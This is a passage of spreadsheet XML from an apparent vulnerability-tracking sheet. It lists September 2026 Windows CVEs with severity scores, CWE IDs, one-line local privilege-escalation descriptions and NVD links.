t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q929" s="5" t="inlineStr" /><c r="R929" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S929" s="5" t="inlineStr"><is><t>Use after free in Windows Embedded Mode Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T929" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69430</t></is></c></row><row r="930"><c r="A930" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B930" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C930" s="5" t="inlineStr"><is><t>CVE-2026-69440</t></is></c><c r="D930" s="5" t="n"><v>7</v></c><c r="E930" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F930" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G930" s="5" t="inlineStr" /><c r="H930" s="5" t="n"><v>0.002</v></c><c r="I930" s="5" t="inlineStr" /><c r="J930" s="5" t="inlineStr" /><c r="K930" s="5" t="inlineStr" /><c r="L930" s="5" t="inlineStr" /><c r="M930" s="5" t="inlineStr" /><c r="N930" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O930" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P930" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q930" s="5" t="inlineStr" /><c r="R930" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S930" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T930" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69440</t></is></c></row><row r="931"><c r="A931" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B931" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C931" s="5" t="inlineStr"><is><t>CVE-2026-69441</t></is></c><c r="D931" s="5" t="n"><v>7</v></c><c r="E931" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F931" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G931" s="5" t="inlineStr" /><c r="H931" s="5" t="n"><v>0.002</v></c><c r="I931" s="5" t="inlineStr" /><c r="J931" s="5" t="inlineStr" /><c r="K931" s="5" t="inlineStr" /><c r="L931" s="5" t="inlineStr" /><c r="M931" s="5" t="inlineStr" /><c r="N931" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O931" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P931" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q931" s="5" t="inlineStr" /><c r="R931" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S931" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T931" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69441</t></is></c></row><row r="932"><c r="A932" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B932" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C932" s="5" t="inlineStr"><is><t>CVE-2026-69448</t></is></c><c r="D932" s="5" t="n"><v>7</v></c><c r="E932" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F932" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G932" s="5" t="inlineStr" /><c r="H932" s="5" t="n"><v>0.002</v></c><c r="I932" s="5" t="inlineStr" /><c r="J932" s="5" t="inlineStr" /><c r="K932" s="5" t="inlineStr" /><c r="L932" s="5" t="inlineStr" /><c r="M932" s="5" t="inlineStr" /><c r="N932" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O932" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P932" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q932" s="5" t="inlineStr" /><c r="R932" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S932" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T932" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69448</t></is></c></row><row r="933"><c r="A933" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B933" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C933" s="5" t="inlineStr"><is><t>CVE-2026-69466</t></is></c><c r="D933" s="5" t="n"><v>7</v></c><c r="E933" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F933" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G933" s="5" t="inlineStr" /><c r="H933" s="5" t="n"><v>0.002</v></c><c r="I933" s="5" t="inlineStr" /><c r="J933" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K93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33" s="5" t="inlineStr" /><c r="M933" s="5" t="inlineStr" /><c r="N933" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O933" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P933" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q933" s="5" t="inlineStr" /><c r="R933" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S933" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T933" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t></is></c></row><row r="934"><c r="A934" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B934" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C934" s="5" t="inlineStr"><is><t>CVE-2026-69468</t></is></c><c r="D934" s="5" t="n"><v>7</v></c><c r="E934" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F934" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G934" s="5" t="inlineStr" /><c r="H934" s="5" t="n"><v>0.003</v></c><c r="I934" s="5" t="inlineStr" /><c r="J934" s="5" t="inlineStr" /><c r="K934" s="5" t="inlineStr" /><c r="L934" s="5" t="inlineStr" /><c r="M934" s="5" t="inlineStr" /><c r="N934" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O934" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P934" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q934" s="5" t="inlineStr" /><c r="R934" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S934" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T934" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69468</t></is></c></row><row r="935"><c r="A935" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B935" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C935" s="5" t="inlineStr"><is><t>CVE-2026-69470</t></is></c><c r="D935" s="5" t="n"><v>7</v></c><c r="E935" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F935" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G935" s="5" t="inlineStr" /><c r="H935" s="5" t="n"><v>0.003</v></c><c r="I935" s="5" t="inlineStr" /><c r="J935" s="5" t="inlineStr" /><c r="K935" s="5" t="inlineStr" /><c r="L935" s="5" t="inlineStr" /><c r="M935" s="5" t="inlineStr" /><c r="N935" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O935" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P935" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q935" s="5" t="inlineStr" /><c r="R935" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S935" s="5" t="inlineStr"><is><t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T935" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69470</t></is></c></row><row r="936"><c r="A936" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B936" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C936" s="5" t="inlineStr"><is><t>CVE-2026-69472</t></is></c><c r="D936" s="5" t="n"><v>7</v></c><c r="E936" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F936" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G936" s="5" t="inlineStr" /><c r="H936" s="5" t="n"><v>0.003</v></c><c r="I936" s="5" t="inlineStr" /><c r="J936" s="5" t="inlineStr" /><c r="K936" s="5" t="inlineStr" /><c r="L936" s="5" t="inlineStr" /><c r="M936" s="5" t="inlineStr" /><c r="N936" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O936" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P936" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q936" s="5" t="inlineStr" /><c r="R936" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S936" s="5" t="inlineStr"><is><t>Use after free in Windows Devices Human Interface allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T936" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69472</t></is></c></row><row r="937"><c r="A937" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B937" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C937" s="5" t="inlineStr"><is><t>CVE-2026-69473</t></is></c><c r="D937" s="5" t="n"><v>7</v></c><c r="E937" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F937" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G937" s="5" t="inlineStr" /><c r="H937" s="5" t="n"><v>0.003</v></c><c r="I937" s="5" t="inlineStr" /><c r="J937" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K93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37" s="5" t="inlineStr" /><c r="M937" s="5" t="inlineStr" /><c r="N937" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O937" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P937" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q937" s="5" t="inlineStr" /><c r="R937" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S937" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T937" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t></is></c></row><row r="938"><c r="A938" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B938" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C938" s="5" t="inlineStr"><is><t>CVE-2026-69488</t></is></c><c r="D938" s="5" t="n"><v>7</v></c><c r="E938" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F938" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G938" s="5" t="inlineStr" /><c r="H938" s="5" t="n"><v>0.003</v></c><c r="I938" s="5" t="inlineStr" /><c r="J938" s="5" t="inlineStr" /><c r="K938" s="5" t="inlineStr" /><c r="L938" s="5" t="inlineStr" /><c r="M938" s="5" t="inlineStr" /><c r="N938" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O938" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P938" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q938" s="5" t="inlineStr" /><c r="R938" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S938" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T938" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69488</t></is></c></row><row r="939"><c r="A939" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B939" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C939" s="5" t="inlineStr"><is><t>CVE-2026-69492</t></is></c><c r="D939" s="5" t="n"><v>7</v></c><c r="E939" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F939" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G939" s="5" t="inlineStr" /><c r="H939" s="5" t="n"><v>0.003</v></c><c r="I939" s="5" t="inlineStr" /><c r="J939" s="5" t="inlineStr" /><c r="K939" s="5" t="inlineStr" /><c r="L939" s="5" t="inlineStr" /><c r="M939" s="5" t="inlineStr" /><c r="N939" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O939" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P939" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q939" s="5" t="inlineStr" /><c r="R939" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S939" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T939" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69492</t></is></c></row><row r="940"><c r="A940" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B940" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C940" s="5" t="inlineStr"><is><t>CVE-2026-69498</t></is></c><c r="D940" s="5" t="n"><v>7</v></c><c r="E940" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F940" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G940" s="5" t="inlineStr" /><c r="H940" s="5" t="n"><v>0.003</v></c><c r="I940" s="5" t="inlineStr" /><c r="J940" s="5" t="inlineStr" /><c r="K940" s="5" t="inlineStr" /><c r="L940" s="5" t="inlineStr" /><c r="M940" s="5" t="inlineStr" /><c r="N940" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O940" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P940" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q940" s="5" t="inlineStr" /><c r="R940" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S940" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T940" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69498</t></is></c></row><row r="941"><c r="A941" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B941" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C941" s="5" t="inlineStr"><is><t>CVE-2026-69500</t></is></c><c r="D941" s="5" t="n"><v>7</v></c><c r="E941" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F941" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G941" s="5" t="inlineStr" /><c r="H941" s="5" t="n"><v>0.003</v></c><c r="I941" s="5" t="inlineStr" /><c r="J941" s="5" t="inlineStr" /><c r="K941" s="5" t="inlineStr" /><c r="L941" s="5" t="inlineStr" /><c r="M941" s="5" t="inlineStr" /><c r="N941" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O941" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P941" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q941" s="5" t="inlineStr" /><c r="R941" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S941" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T941" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69500</t></is></c></row><row r="942"><c r="A942" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B942" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C942" s="5" t="inlineStr"><is><t>CVE-2026-69501</t></is></c><c r="D942" s="5" t="n"><v>7</v></c><c r="E942" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F942" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G942" s="5" t="inlineStr" /><c r="H942" s="5" t="n"><v>0.002</v></c><c r="I942" s="5" t="inlineStr" /><c r="J942" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K942" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L942" s="5" t="inlineStr" /><c r="M942" s="5" t="inlineStr" /><c r="N942" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O942" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P942" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q942" s="5" t="inlineStr" /><c r="R942" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S942" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T942" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t></is></c></row><row r="943"><c r="A943" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B943" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C943" s="5" t="inlineStr"><is><t>CVE-2026-69516</t></is></c><c r="D943" s="5" t="n"><v>7</v></c><c r="E943" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F943" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G943" s="5" t="inlineStr" /><c r="H943" s="5" t="n"><v>0.002</v></c><c r="I943" s="5" t="inlineStr" /><c r="J943" s="5" t="inlineStr" /><c r="K943" s="5" t="inlineStr" /><c r="L943" s="5" t="inlineStr" /><c r="M943" s="5" t="inlineStr" /><c r="N943" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O943" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P943" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q943" s="5" t="inlineStr" /><c r="R943" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S943" s="5" t="inlineStr"><is><t>Use after free in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T943" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69516</t></is></c></row><row r="944"><c r="A944" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B944" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C944" s="5" t="inlineStr"><is><t>CVE-2026-69517</t></is></c><c r="D944" s="5" t="n"><v>7</v></c><c r="E944" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F944" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G944" s="5" t="inlineStr" /><c r="H944" s="5" t="n"><v>0.003</v></c><c r="I944" s="5" t="inlineStr" /><c r="J944" s="5" t="inlineStr" /><c r="K944" s="5" t="inlineStr" /><c r="L944" s="5" t="inlineStr" /><c r="M944" s="5" t="inlineStr" /><c r="N944" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O944" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P944" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q944" s="5" t="inlineStr" /><c r="R944" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S944" s="5" t="inlineStr"><is><t>Use after free in Windows Wireless Networking allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T944" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69517</t></is></c></row><row r="945"><c r="A945" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B945" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C945" s="5" t="inlineStr"><is><t>CVE-2026-69540</t></is></c><c r="D945" s="5" t="n"><v>7</v></c><c r="E945" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F945" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G945" s="5" t="inlineStr" /><c r="H945" s="5" t="n"><v>0.003</v></c><c r="I945" s="5" t="inlineStr" /><c r="J945" s="5" t="inlineStr" /><c r="K945" s="5" t="inlineStr" /><c r="L945" s="5" t="inlineStr" /><c r="M945" s="5" t="inlineStr" /><c r="N945" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O945" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P945" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q945" s="5" t="inlineStr" /><c r="R945" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S945" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T945" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69540</t></is></c></row><row r="946"><c r="A946" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B946" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C946" s="5" t="inlineStr"><is><t>CVE-2026-69549</t></is></c><c r="D946" s="5" t="n"><v>7</v></c><c r="E946" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F946" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G946" s="5" t="inlineStr" /><c r="H946" s="5" t="n"><v>0.003</v></c><c r="I946" s="5" t="inlineStr" /><c r="J946" s="5" t="inlineStr" /><c r="K946" s="5" t="inlineStr" /><c r="L946" s="5" t="inlineStr" /><c r="M946" s="5" t="inlineStr" /><c r="N946" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O946" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P946" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q946" s="5" t="inlineStr" /><c r="R946" s="5" t="inlineStr"><is><t>CWE-125, CWE-200</t></is></c><c r="S946" s="5" t="inlineStr"><is><t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T946" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69549</t></is></c></row><row r="947"><c r="A947" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B947" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C947" s="5" t="inlineStr"><is><t>CVE-2026-69560</t></is></c><c r="D947" s="5" t="n"><v>7</v></c><c r="E947" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F947" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G947" s="5" t="inlineStr" /><c r="H947" s="5" t="n"><v>0.003</v></c><c r="I947" s="5" t="inlineStr" /><c r="J947" s="5" t="inlineStr" /><c r="K947" s="5" t="inlineStr" /><c r="L947" s="5" t="inlineStr" /><c r="M947" s="5" t="inlineStr" /><c r="N947" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O947" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P947" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q947" s="5" t="inlineStr" /><c r="R947" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S947" s="5" t="inlineStr"><is><t>Use after free in Windows Work Folder Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T947" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69560</t></is></c></row><row r="948"><c r="A948" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B948" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C948" s="5" t="inlineStr"><is><t>CVE-2026-69563</t></is></c><c r="D948" s="5" t="n"><v>7</v></c><c r="E948" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F948" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G948" s="5" t="inlineStr" /><c r="H948" s="5" t="n"><v>0.002</v></c><c r="I948" s="5" t="inlineStr" /><c r="J948" s="5" t="inlineStr" /><c r="K948" s="5" t="inlineStr" /><c r="L948" s="5" t="inlineStr" /><c r="M948" s="5" t="inlineStr" /><c r="N948" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O948" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P948" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q948" s="5" t="inlineStr" /><c r="R948" s="5" t="inlineStr"><is><t>CWE-122, CWE-367</t></is></c><c r="S948" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T948" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69563</t></is></c></row><row r="949"><c r="A949" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B949" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C949" s="5" t="inlineStr"><is><t>CVE-2026-69564</t></is></c><c r="D949" s="5" t="n"><v>7</v></c><c r="E949" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F949" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G949" s="5" t="inlineStr" /><c r="H949" s="5" t="n"><v>0.003</v></c><c r="I949" s="5" t="inlineStr" /><c r="J949" s="5" t="inlineStr" /><c r="K949" s="5" t="inlineStr" /><c r="L949" s="5" t="inlineStr" /><c r="M949" s="5" t="inlineStr" /><c r="N949" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O949" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P949" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q949" s="5" t="inlineStr" /><c r="R949" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S949" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Online Certificate Status Protocol (OCSP) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T949" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69564</t></is></c></row><row r="950"><c r="A950" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B950" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C950" s="5" t="inlineStr"><is><t>CVE-2026-69567</t></is></c><c r="D950" s="5" t="n"><v>7</v></c><c r="E950" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F950" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G950" s="5" t="inlineStr" /><c r="H950" s="5" t="n"><v>0.002</v></c><c r="I950" s="5" t="inlineStr" /><c r="J950" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K95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50" s="5" t="inlineStr" /><c r="M950" s="5" t="inlineStr" /><c r="N950" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O950" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P950" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q950" s="5" t="inlineStr" /><c r="R950" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S950" s="5" t="inlineStr"><is><t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T950" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t></is></c></row><row r="951"><c r="A951" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B951" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C951" s="5" t="inlineStr"><is><t>CVE-2026-69573</t></is></c><c r="D951" s="5" t="n"><v>7</v></c><c r="E951" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F951" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G951" s="5" t="inlineStr" /><c r="H951" s="5" t="n"><v>0.003</v></c><c r="I951" s="5" t="inlineStr" /><c r="J951" s="5" t="inlineStr" /><c r="K951" s="5" t="inlineStr" /><c r="L951" s="5" t="inlineStr" /><c r="M951" s="5" t="inlineStr" /><c r="N951" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O951" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P951" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q951" s="5" t="inlineStr" /><c r="R951" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S951" s="5" t="inlineStr"><is><t>Use after free in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T951" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69573</t></is></c></row><row r="952"><c r="A952" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B952" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C952" s="5" t="inlineStr"><is><t>CVE-2026-69574</t></is></c><c r="D952" s="5" t="n"><v>7</v></c><c r="E952" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F952" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G952" s="5" t="inlineStr" /><c r="H952" s="5" t="n"><v>0.003</v></c><c r="I952" s="5" t="inlineStr" /><c r="J952" s="5" t="inlineStr" /><c r="K952" s="5" t="inlineStr" /><c r="L952" s="5" t="inlineStr" /><c r="M952" s="5" t="inlineStr" /><c r="N952" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O952" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P952" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q952" s="5" t="inlineStr" /><c r="R952" s="5" 